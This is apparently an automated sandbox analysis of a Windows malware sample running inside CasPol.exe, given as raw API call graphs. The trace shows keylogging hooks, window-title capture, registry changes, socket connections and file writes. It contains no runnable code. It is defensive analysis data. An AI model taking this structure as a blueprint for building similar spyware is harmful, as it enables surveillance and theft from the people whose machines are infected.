46174->46175 46177 40dd3b 46175->46177 46178 4126fd RegSetValueExA RegCloseKey 46176->46178 46177->45892 46178->46174 46180 43a600 _swprintf 46179->46180 46541 43993e 46180->46541 46184 41a737 46183->46184 46185 41a69c GetLocalTime 46183->46185 46187 401eea 26 API calls 46184->46187 46186 404cbf 28 API calls 46185->46186 46188 41a6de 46186->46188 46189 41a73f 46187->46189 46190 405ce6 28 API calls 46188->46190 46191 401eea 26 API calls 46189->46191 46192 41a6ea 46190->46192 46193 40ddaa 46191->46193 46575 4027cb 46192->46575 46193->45916 46195 41a6f6 46196 405ce6 28 API calls 46195->46196 46197 41a702 46196->46197 46578 406478 76 API calls 46197->46578 46199 41a710 46200 401eea 26 API calls 46199->46200 46201 41a71c 46200->46201 46202 401eea 26 API calls 46201->46202 46203 41a725 46202->46203 46204 401eea 26 API calls 46203->46204 46205 41a72e 46204->46205 46206 401eea 26 API calls 46205->46206 46206->46184 46208 409536 _wcslen 46207->46208 46209 409541 46208->46209 46210 409558 46208->46210 46212 40c89e 31 API calls 46209->46212 46211 40c89e 31 API calls 46210->46211 46213 409560 46211->46213 46214 409549 46212->46214 46215 401e18 26 API calls 46213->46215 46216 401e18 26 API calls 46214->46216 46217 40956e 46215->46217 46231 409553 46216->46231 46218 401e13 26 API calls 46217->46218 46220 409576 46218->46220 46219 401e13 26 API calls 46221 4095ad 46219->46221 46598 40856b 28 API calls 46220->46598 46583 409837 46221->46583 46224 409588 46599 4028cf 46224->46599 46227 409593 46228 401e18 26 API calls 46227->46228 46229 40959d 46228->46229 46230 401e13 26 API calls 46229->46230 46230->46231 46231->46219 46763 403b40 46232->46763 46236 41a7fd 46237 4028cf 28 API calls 46236->46237 46238 41a807 46237->46238 46239 401e13 26 API calls 46238->46239 46240 41a810 46239->46240 46241 401e13 26 API calls 46240->46241 46242 40dfc3 46241->46242 46242->45969 46244 40e08b 46243->46244 46245 41248f RegQueryValueExA RegCloseKey 46243->46245 46244->45998 46244->46001 46245->46244 46247 4125b0 RegQueryValueExW RegCloseKey 46246->46247 46248 4125dd 46246->46248 46247->46248 46249 403b40 28 API calls 46248->46249 46250 40e0ba 46249->46250 46250->46010 46252 412992 RegDeleteValueW 46251->46252 46253 4129a6 46251->46253 46252->46253 46254 4129a2 46252->46254 46253->46019 46254->46019 46256 40cbc5 46255->46256 46257 41246e 3 API calls 46256->46257 46258 40cbcc 46257->46258 46259 40cbeb 46258->46259 46791 401602 46258->46791 46263 413fd4 46259->46263 46261 40cbd9 46794 4127d5 RegCreateKeyA 46261->46794 46264 413feb 46263->46264 46811 41aa73 46264->46811 46266 413ff6 46267 401d64 28 API calls 46266->46267 46268 41400f 46267->46268 46269 43a5e7 42 API calls 46268->46269 46270 41401c 46269->46270 46271 414021 Sleep 46270->46271 46272 41402e 46270->46272 46271->46272 46273 401f66 28 API calls 46272->46273 46274 41403d 46273->46274 46275 401d64 28 API calls 46274->46275 46276 41404b 46275->46276 46277 401fbd 28 API calls 46276->46277 46278 414053 46277->46278 46279 41afc3 28 API calls 46278->46279 46280 41405b 46279->46280 46815 404262 WSAStartup 46280->46815 46282 414065 46283 401d64 28 API calls 46282->46283 46284 41406e 46283->46284 46285 401d64 28 API calls 46284->46285 46325 4140ed 46284->46325 46286 414087 46285->46286 46288 401d64 28 API calls 46286->46288 46287 401fbd 28 API calls 46287->46325 46289 414098 46288->46289 46291 401d64 28 API calls 46289->46291 46290 41afc3 28 API calls 46290->46325 46292 4140a9 46291->46292 46294 401d64 28 API calls 46292->46294 46293 401d64 28 API calls 46293->46325 46296 4140ba 46294->46296 46295 4085b4 28 API calls 46295->46325 46298 401d64 28 API calls 46296->46298 46297 401eef 26 API calls 46297->46325 46299 4140cb 46298->46299 46300 401d64 28 API calls 46299->46300 46301 4140dd 46300->46301 46917 404101 87 API calls 46301->46917 46303 401eea 26 API calls 46303->46325 46305 414244 WSAGetLastError 46918 41bc76 30 API calls 46305->46918 46311 41a686 79 API calls 46311->46325 46313 404cbf 28 API calls 46313->46325 46314 401d8c 26 API calls 46314->46325 46315 43a5e7 42 API calls 46316 414b80 Sleep 46315->46316 46316->46325 46317 405ce6 28 API calls 46317->46325 46318 4027cb 28 API calls 46318->46325 46319 401f66 28 API calls 46319->46325 46321 4082dc 28 API calls 46321->46325 46324 412513 31 API calls 46324->46325 46325->46287 46325->46290 46325->46293 46325->46295 46325->46297 46325->46303 46325->46305 46325->46311 46325->46313 46325->46314 46325->46315 46325->46317 46325->46318 46325->46319 46325->46321 46325->46324 46329 41446f 46325->46329 46816 413f9a 46325->46816 46821 4041f1 46325->46821 46828 404915 46325->46828 46843 40428c connect 46325->46843 46903 4047eb WaitForSingleObject 46325->46903 46919 404c9e 28 API calls 46325->46919 46920 413683 50 API calls 46325->46920 46921 440c51 26 API calls 46325->46921 46922 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46325->46922 46326 403b40 28 API calls 46326->46329 46329->46325 46329->46326 46330 401d64 28 API calls 46329->46330 46334 41ad46 28 API calls 46329->46334 46337 41aec8 28 API calls 46329->46337 46339 40275c 28 API calls 46329->46339 46340 405ce6 28 API calls 46329->46340 46341 4027cb 28 API calls 46329->46341 46343 401eea 26 API calls 46329->46343 46344 401e13 26 API calls 46329->46344 46347 401f66 28 API calls 46329->46347 46348 41a686 79 API calls 46329->46348 46349 414b22 CreateThread 46329->46349 46923 40cbf1 6 API calls 46329->46923 46924 41adee 28 API calls 46329->46924 46926 41aca0 GetTickCount 46329->46926 46927 41ac52 30 API calls ___scrt_fastfail 46329->46927 46928 40e679 29 API calls 46329->46928 46929 4027ec 28 API calls 46329->46929 46930 404468 59 API calls ctype 46329->46930 46931 4045d5 111 API calls ___crtLCMapStringA 46329->46931 46932 40a767 84 API calls 46329->46932 46331 4144ed GetTickCount 46330->46331 46925 41ad46 28 API calls 46331->46925 46334->46329 46337->46329 46339->46329 46340->46329 46341->46329 46343->46329 46344->46329 46347->46329 46348->46329 46349->46329 46957 419e89 102 API calls 46349->46957 46350->45769 46351->45779 46354 4085c0 46353->46354 46355 402e78 28 API calls 46354->46355 46356 4085e4 46355->46356 46356->45800 46358 4124e1 RegQueryValueExA RegCloseKey 46357->46358 46359 41250b 46357->46359 46358->46359 46359->45796 46360->45803 46361->45832 46362->45825 46363->45816 46364->45830 46366 40c8ba 46365->46366 46367 40c8da 46366->46367 46368 40c90f 46366->46368 46369 40c8d0 46366->46369 46958 41a74b 29 API calls 46367->46958 46372 41b15b GetCurrentProcess 46368->46372 46371 40ca03 GetLongPathNameW 46369->46371 46374 403b40 28 API calls 46371->46374 46375 40c914 46372->46375 46373 40c8e3 46376 401e18 26 API calls 46373->46376 46377 40ca18 46374->46377 46378 40c918 46375->46378 46379 40c96a 46375->46379 46380 40c8ed 46376->46380 46381 403b40 28 API calls 46377->46381 46383 403b40 28 API calls 46378->46383 46382 403b40 28 API calls 46379->46382 46387 401e13 26 API calls 46380->46387 46384 40ca27 46381->46384 46385 40c978 46382->46385 46386 40c926 46383->46386 46961 40cc37 28 API calls 46384->46961 46390 403b40 28 API calls 46385->46390 46391 403b40 28 API calls 46386->46391 46387->46369 46389 40ca3a 46962 402860 28 API calls 46389->46962 46394 40c98e 46390->46394 46395 40c93c 46391->46395 46393 40ca45 46963 402860 28 API calls 46393->46963 46960 402860 28 API calls 46394->46960 46959 402860 28 API calls 46395->46959 46399 40ca4f 46402 401e13 26 API calls 46399->46402 46400 40c999 46403 401e18 26 API calls 46400->46403 46401 40c947 46404 401e18 26 API calls 46401->46404 46405 40ca59 46402->46405 46406 40c9a4 46403->46406 46407 40c952 46404->46407 46408 401e13 26 API calls 46405->46408 46409 401e13 26 API calls 46406->46409 46410 401e13 26 API calls 46407->46410 46411 40ca62 46408->46411 46412 40c9ad 46409->46412 46413 40c95b 46410->46413 46414 401e13 26 API calls 46411->46414 46415 401e13 26 API calls 46412->46415 46416 401e13 26 API calls 46413->46416 46417 40ca6b 46414->46417 46415->46380 46416->46380 46418 401e13 26 API calls 46417->46418 46419 40ca74 46418->46419 46420 401e13 26 API calls 46419->46420 46421 40ca7d 46420->46421 46421->45878 46422->45890 46423->45912 46424->45871 46425->45904 46426->45940 46427->45950 46428->45974 46429->45962 46430->45995 46432 401e0c 46431->46432 46433->45823 46436 40e183 46435->46436 46437 41a65c LoadResource LockResource SizeofResource 46435->46437 46436->46052 46437->46436 46439 401f8e 46438->46439 46445 402325 46439->46445 46441 401fa4 46441->46056 46443 401f86 28 API calls 46442->46443 46444 406066 46443->46444 46444->46063 46446 40232f 46445->46446 46448 40233a 46446->46448 46449 40294a 28 API calls 46446->46449 46448->46441 46449->46448 46451 40250d 46450->46451 46452 40252b 46451->46452 46454 40261a 28 API calls 46451->46454 46452->46067 46454->46452 46455->46069 46457 41bfae 46456->46457 46458 41bfcb 46457->46458 46460 41bfd2 46457->46460 46483 41bfe3 28 API calls 46458->46483 46464 41c552 46460->46464 46461 41bfd0 46461->46069 46463->46078 46465 41c55c __EH_prolog 46464->46465 46466 41c673 46465->46466 46467 41c595 46465->46467 46490 402649 28 API calls std::_Xinvalid_argument 46466->46490 46484 4026a7 28 API calls 46467->46484 46471 41c5a9 46485 41c536 28 API calls 46471->46485 46473 41c5dc 46474 41c603 46473->46474 46475 41c5f7 46473->46475 46487 41c7cf 26 API calls 46474->46487 46486 41c7b2 26 API calls 46475->46486 46478 41c601 46489 41c75a 26 API calls 46478->46489 46479 41c60f 46488 41c7cf 26 API calls 46479->46488 46482 41c63e 46482->46461 46483->46461 46484->46471 46485->46473 46486->46478 46487->46479 46488->46478 46489->46482 46491->46092 46492->46096 46493->46098 46496 402e85 46495->46496 46497 402e98 46496->46497 46499 402ea9 46496->46499 46500 402eae 46496->46500 46502 403445 28 API calls 46497->46502 46499->46107 46500->46499 46503 40225b 26 API calls 46500->46503 46502->46499 46503->46499 46505 404bd0 46504->46505 46508 40245c 46505->46508 46507 404be4 46507->46110 46509 402469 46508->46509 46511 402478 46509->46511 46512 402ad3 28 API calls 46509->46512 46511->46507 46512->46511 46513->46114 46514->46117 46516 401e94 46515->46516 46518 41a471 46517->46518 46519 41b168 GetCurrentProcess 46517->46519 46520 412513 RegOpenKeyExA 46518->46520 46519->46518 46521 412541 RegQueryValueExA RegCloseKey 46520->46521 46522 412569 46520->46522 46521->46522 46523 401f66 28 API calls 46522->46523 46524 41257e 46523->46524 46524->46131 46525->46139 46527 40b02f 46526->46527 46530 40b04b 46527->46530 46529 40b045 46529->46150 46531 40b055 46530->46531 46533 40b060 46531->46533 46534 40b138 28 API calls 46531->46534 46533->46529 46534->46533 46535->46153 46536->46156 46538 40230d 46537->46538 46539 402325 28 API calls 46538->46539 46540 401f80 46539->46540 46540->45883 46559 43a545 46541->46559 46543 43998b 46568 4392de 38 API calls 3 library calls 46543->46568 46545 439950 46545->46543 46546 439965 46545->46546 46558 40dd54 46545->46558 46566 445354 20 API calls _free 46546->46566 46548 43996a 46567 43a827 26 API calls _Deallocate 46548->46567 46551 439997 46552 4399c6 46551->46552 46569 43a58a 42 API calls __Tolower 46551->46569 46553 439a32 46552->46553 46570 43a4f1 26 API calls 2 library calls 46552->46570 46571 43a4f1 26 API calls 2 library calls 46553->46571 46556 439af9 _swprintf 46556->46558 46572 445354 20 API calls _free 46556->46572 46558->45898 46558->45900 46560 43a54a 46559->46560 46561 43a55d 46559->46561 46573 445354 20 API calls _free 46560->46573 46561->46545 46563 43a54f 46574 43a827 26 API calls _Deallocate 46563->46574 46565 43a55a 46565->46545 46566->46548 46567->46558 46568->46551 46569->46551 46570->46553 46571->46556 46572->46558 46573->46563 46574->46565 46579 401e9b 46575->46579 46577 4027d9 46577->46195 46578->46199 46580 401ea7 46579->46580 46581 40245c 28 API calls 46580->46581 46582 401eb9 46581->46582 46582->46577 46584 409855 46583->46584 46585 4124b7 3 API calls 46584->46585 46586 40985c 46585->46586 46587 409870 46586->46587 46588 40988a 46586->46588 46590 4095cf 46587->46590 46591 409875 46587->46591 46602 4082dc 46588->46602 46590->45935 46592 4082dc 28 API calls 46591->46592 46594 409883 46592->46594 46628 409959 29 API calls 46594->46628 46597 409888 46597->46590 46598->46224 46754 402d8b 46599->46754 46601 4028dd 46601->46227 46603 4082eb 46602->46603 46629 408431 46603->46629 46605 408309 46606 4098a5 46605->46606 46634 40affa 46606->46634 46609 4098f6 46611 401f66 28 API calls 46609->46611 46610 4098ce 46612 401f66 28 API calls 46610->46612 46613 409901 46611->46613 46614 4098d8 46612->46614 46615 401f66 28 API calls 46613->46615 46616 41ae08 28 API calls 46614->46616 46617 409910 46615->46617 46618 4098e6 46616->46618 46619 41a686 79 API calls 46617->46619 46638 40a876 31 API calls ___crtLCMapStringA 46618->46638 46621 409915 CreateThread 46619->46621 46624 409930 CreateThread 46621->46624 46625 40993c CreateThread 46621->46625 46644 4099a9 46621->46644 46622 4098ed 46623 401eea 26 API calls 46622->46623 46623->46609 46624->46625 46650 409993 46624->46650 46626 401e13 26 API calls 46625->46626 46647 4099b5 46625->46647 46627 409950 46626->46627 46627->46590 46628->46597 46753 40999f 135 API calls 46628->46753 46630 40843d 46629->46630 46632 40845b 46630->46632 46633 402f0d 28 API calls 46630->46633 46632->46605 46633->46632 46635 40b006 46634->46635 46636 4098c3 46635->46636 46639 403b9e 46635->46639 46636->46609 46636->46610 46638->46622 46640 403ba8 46639->46640 46642 403bb3 46640->46642 46643 403cfd 28 API calls 46640->46643 46642->46636 46643->46642 46653 409e48 46644->46653 46698 40a3f4 46647->46698 46736 4099e4 46650->46736 46654 409e5d Sleep 46653->46654 46673 409d97 46654->46673 46656 4099b2 46657 409e9d CreateDirectoryW 46662 409e6f 46657->46662 46658 409eae GetFileAttributesW 46658->46662 46659 401d64 28 API calls 46659->46662 46660 409ec5 SetFileAttributesW 46660->46662 46662->46654 46662->46656 46662->46657 46662->46658 46662->46659 46662->46660 46671 409f10 46662->46671 46686 41b58f 46662->46686 46663 409f3f PathFileExistsW 46663->46671 46665 401f86 28 API calls 46665->46671 46666 40a048 SetFileAttributesW 46666->46662 46667 401eea 26 API calls 46667->46671 46668 401eef 26 API calls 46668->46671 46669 406052 28 API calls 46669->46671 46671->46663 46671->46665 46671->46666 46671->46667 46671->46668 46671->46669 46672 401eea 26 API calls 46671->46672 46695 41b61a 32 API calls 46671->46695 46696 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 46671->46696 46672->46662 46674 409e44 46673->46674 46676 409dad 46673->46676 46674->46662 46675 409dcc CreateFileW 46675->46676 46677 409dda GetFileSize 46675->46677 46676->46675 46678 409e0f CloseHandle 46676->46678 46679 409e21 46676->46679 46680 409e04 Sleep 46676->46680 46681 409dfd 46676->46681 46677->46676 46677->46678 46678->46676 46679->46674 46683 4082dc 28 API calls 46679->46683 46680->46678 46697 40a7f0 83 API calls 46681->46697 46684 409e3d 46683->46684 46685 4098a5 126 API calls 46684->46685 46685->46674 46687 41b5a2 CreateFileW 46686->46687 46689 41b5db 46687->46689 46690 41b5df 46687->46690 46689->46662 46691 41b5f6 WriteFile 46690->46691 46692 41b5e6 SetFilePointer 46690->46692 46693 41b60b CloseHandle 46691->46693 46694 41b609 46691->46694 46692->46691 46692->46693 46693->46689 46694->46693 46695->46671 46696->46671 46697->46680 46704 40a402 46698->46704 46699 4099be 46700 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 46701 40b027 28 API calls 46700->46701 46701->46704 46704->46699 46704->46700 46707 40a4a2 GetWindowTextW 46704->46707 46723 40a4bc 46704->46723 46727 433519 5 API calls __Init_thread_wait 46704->46727 46728 4338a5 29 API calls __onexit 46704->46728 46729 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 46704->46729 46705 41aca0 GetTickCount 46705->46723 46707->46704 46709 401e13 26 API calls 46709->46723 46710 40a5ff 46712 401e13 26 API calls 46710->46712 46711 40affa 28 API calls 46711->46723 46712->46699 46713 40a569 Sleep 46713->46723 46716 401f66 28 API calls 46716->46723 46717 4082dc 28 API calls 46717->46723 46720 405ce6 28 API calls 46720->46723 46722 4028cf 28 API calls 46722->46723 46723->46704 46723->46705 46723->46709 46723->46710 46723->46711 46723->46713 46723->46716 46723->46717 46723->46720 46723->46722 46724 41ae08 28 API calls 46723->46724 46725 409d58 27 API calls 46723->46725 46726 401eea 26 API calls 46723->46726 46730 4082a8 28 API calls 46723->46730 46731 40a876 31 API calls ___crtLCMapStringA 46723->46731 46732 40b0dd 28 API calls 46723->46732 46733 40ae58 44 API calls 2 library calls 46723->46733 46734 440c51 26 API calls 46723->46734 46735 404c9e 28 API calls 46723->46735 46724->46723 46725->46723 46726->46723 46727->46704 46728->46704 46729->46704 46730->46723 46731->46723 46732->46723 46733->46723 46734->46723 46735->46723 46737 409a63 GetMessageA 46736->46737 46738 4099ff GetModuleHandleA SetWindowsHookExA 46736->46738 46740 409a75 TranslateMessage DispatchMessageA 46737->46740 46750 40999c 46737->46750 46738->46737 46739 409a1b GetLastError 46738->46739 46751 41ad46 28 API calls 46739->46751 46740->46737 46740->46750 46742 409a31 46752 404c9e 28 API calls 46742->46752 46744 409a3e 46745 401f66 28 API calls 46744->46745 46746 409a4d 46745->46746 46747 41a686 79 API calls 46746->46747 46748 409a52 46747->46748 46749 401eea 26 API calls 46748->46749 46749->46750 46751->46742 46752->46744 46755 402d97 46754->46755 46758 4030f7 46755->46758 46757 402dab 46757->46601 46759 403101 46758->46759 46761 403115 46759->46761 46762 4036c2 28 API calls 46759->46762 46761->46757 46762->46761 46764 403b48 46763->46764 46770 403b7a 46764->46770 46767 403cbb 46774 403dc2 46767->46774 46769 403cc9 46769->46236 46771 403b86 46770->46771 46772 403b9e 28 API calls 46771->46772 46773 403b5a 46772->46773 46773->46767 46775 403dce 46774->46775 46778 402ffd 46775->46778 46777 403de3 46777->46769 46779 40300e 46778->46779 46784 4032a4 46779->46784 46783 40302e 46783->46777 46785 4032b0 46784->46785 46786 40301a 46784->46786 46790 4032b6 28 API calls 46785->46790 46786->46783 46789 4035e8 28 API calls 46786->46789 46789->46783 46797 4395ba 46791->46797 46795 412814 46794->46795 46796 4127ed RegSetValueExA RegCloseKey 46794->46796 46795->46259 46796->46795 46800 43953b 46797->46800 46799 401608 46799->46261 46801 43954a 46800->46801 46803 43955e 46800->46803 46808 445354 20 API calls _free 46801->46808 46807 43955a __alldvrm 46803->46807 46810 447601 11 API calls 2 library calls 46803->46810 46804 43954f 46809 43a827 26 API calls _Deallocate 46804->46809 46807->46799 46808->46804 46809->46807 46810->46807 46812 41aab9 ctype ___scrt_fastfail 46811->46812 46813 401f66 28 API calls 46812->46813 46814 41ab2e 46813->46814 46814->46266 46815->46282 46817 413fb3 getaddrinfo WSASetLastError 46816->46817 46818 413fa9 46816->46818 46817->46325 46933 413e37 35 API calls ___std_exception_copy 46818->46933 46820 413fae 46820->46817 46822 404206 socket 46821->46822 46823 4041fd 46821->46823 46825 404220 46822->46825 46826 404224 CreateEventW 46822->46826 46934 404262 WSAStartup 46823->46934 46825->46325 46826->46325 46827 404202 46827->46822 46827->46825 46829 4049b1 46828->46829 46831 40492a 46828->46831 46829->46325 46830 404933 46832 404987 CreateEventA CreateThread 46830->46832 46831->46830 46831->46832 46833 404942 GetLocalTime 46831->46833 46832->46829 46937 404b1d 46832->46937 46935 41ad46 28 API calls 46833->46935 46835 40495b 46936 404c9e 28 API calls 46835->46936 46837 404968 46838 401f66 28 API calls 46837->46838 46839 404977 46838->46839 46840 41a686 79 API calls 46839->46840 46841 40497c 46840->46841 46842 401eea 26 API calls 46841->46842 46842->46832 46844 4043e1 46843->46844 46845 4042b3 46843->46845 46846 4043e7 WSAGetLastError 46844->46846 46847 404343 46844->46847 46845->46847 46849 404cbf 28 API calls 46845->46849 46867 4042e8 46845->46867 46846->46847 46848 4043f7 46846->46848 46847->46325 46850 4042f7 46848->46850 46851 4043fc 46848->46851 46853 4042d4 46849->46853 46856 401f66 28 API calls 46850->46856 46952 41bc76 30 API calls 46851->46952 46857 401f66 28 API calls 46853->46857 46855 4042f0 46855->46850 46862 404306 46855->46862 46859 404448 46856->46859 46860 4042e3 46857->46860 46858 40440b 46953 404c9e 28 API calls 46858->46953 46863 401f66 28 API calls 46859->46863 46864 41a686 79 API calls 46860->46864 46869 404315 46862->46869 46870 40434c 46862->46870 46866 404457 46863->46866 46864->46867 46865 404418 46868 401f66 28 API calls 46865->46868 46871 41a686 79 API calls 46866->46871 46941 420151 27 API calls 46867->46941 46872 404427 46868->46872 46874 401f66 28 API calls 46869->46874 46949 420f34 55 API calls 46870->46949 46871->46847 46876 41a686 79 API calls 46872->46876 46875 404324 46874->46875 46878 401f66 28 API calls 46875->46878 46879 40442c 46876->46879 46877 404354 46880 404389 46877->46880 46881 404359 46877->46881 46882 404333 46878->46882 46884 401eea 26 API calls 46879->46884 46951 4202ea 28 API calls 46880->46951 46885 401f66 28 API calls 46881->46885 46886 41a686 79 API calls 46882->46886 46884->46847 46888 404368 46885->46888 46889 404338 46886->46889 46887 404391 46890 4043be CreateEventW CreateEventW 46887->46890 46892 401f66 28 API calls 46887->46892 46891 401f66 28 API calls 46888->46891 46942 420191 46889->46942 46890->46847 46893 404377 46891->46893 46896 4043a7 46892->46896 46894 41a686 79 API calls 46893->46894 46897 40437c 46894->46897 46898 401f66 28 API calls 46896->46898 46950 420592 53 API calls 46897->46950 46900 4043b6 46898->46900 46901 41a686 79 API calls 46900->46901 46902 4043bb 46901->46902 46902->46890 46904 404805 SetEvent CloseHandle 46903->46904 46905 40481c closesocket 46903->46905 46906 40489c 46904->46906 46907 404829 46905->46907 46906->46325 46908 404838 46907->46908 46909 40483f 46907->46909 46956 404ab1 83 API calls 46908->46956 46911 404851 WaitForSingleObject 46909->46911 46912 404892 SetEvent CloseHandle 46909->46912 46913 420191 3 API calls 46911->46913 46912->46906 46914 404860 SetEvent WaitForSingleObject 46913->46914 46915 420191 3 API calls 46914->46915 46916 404878 SetEvent CloseHandle CloseHandle 46915->46916 46916->46912 46917->46325 46918->46325 46919->46325 46920->46325 46921->46325 46922->46325 46923->46329 46924->46329 46925->46329 46926->46329 46927->46329 46928->46329 46929->46329 46930->46329 46931->46329 46932->46329 46933->46820 46934->46827 46935->46835 46936->46837 46940 404b29 101 API calls 46937->46940 46939 404b26 46940->46939 46941->46855 46943 41dc15 46942->46943 46944 420199 46942->46944 46945 41dc23 46943->46945 46954 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46943->46954 46944->46847 46955 41d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46945->46955 46948 41dc2a 46949->46877 46950->46889 46951->46887 46952->46858 46953->46865 46954->46945 46955->46948 46956->46909 46958->46373 46959->46401 46960->46400 46961->46389 46962->46393 46963->46399 46966 40e56a 46964->46966 46965 4124b7 3 API calls 46965->46966 46966->46965 46967 40e60e 46966->46967 46969 40e5fe Sleep 46966->46969 46974 40e59c 46966->46974 46970 4082dc 28 API calls 46967->46970 46968 4082dc 28 API calls 46968->46974 46969->46966 46971 40e619 46970->46971 46975 41ae08 28 API calls 46971->46975 46973 41ae08 28 API calls 46973->46974 46974->46968 46974->46969 46974->46973 46979 401e13 26 API calls 46974->46979 46982 401f66 28 API calls 46974->46982 46986 4126d2 29 API calls 46974->46986 46997 40bf04 73 API calls ___scrt_fastfail 46974->46997 46998 412774 29 API calls 46974->46998 46976 40e625 46975->46976 46999 412774 29 API calls 46976->46999 46979->46974 46980 40e638 46981 401e13 26 API calls 46980->46981 46983 40e644 46981->46983 46982->46974 46984 401f66 28 API calls 46983->46984 46985 40e655 46984->46985 46987 4126d2 29 API calls 46985->46987 46986->46974 46988 40e668 46987->46988 47000 411699 TerminateProcess WaitForSingleObject 46988->47000 46990 40e670 ExitProcess 47001 411637 60 API calls 46996->47001 46998->46974 46999->46980 47000->46990

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                              • API String ID: 384173800-625181639
                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1276 4099e4-4099fd 1277 409a63-409a73 GetMessageA 1276->1277 1278 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1276->1278 1280 409a75-409a8d TranslateMessage DispatchMessageA 1277->1280 1281 409a8f 1277->1281 1278->1277 1279 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1278->1279 1283 409a91-409a96 1279->1283 1280->1277 1280->1281 1281->1283
                                                                              APIs
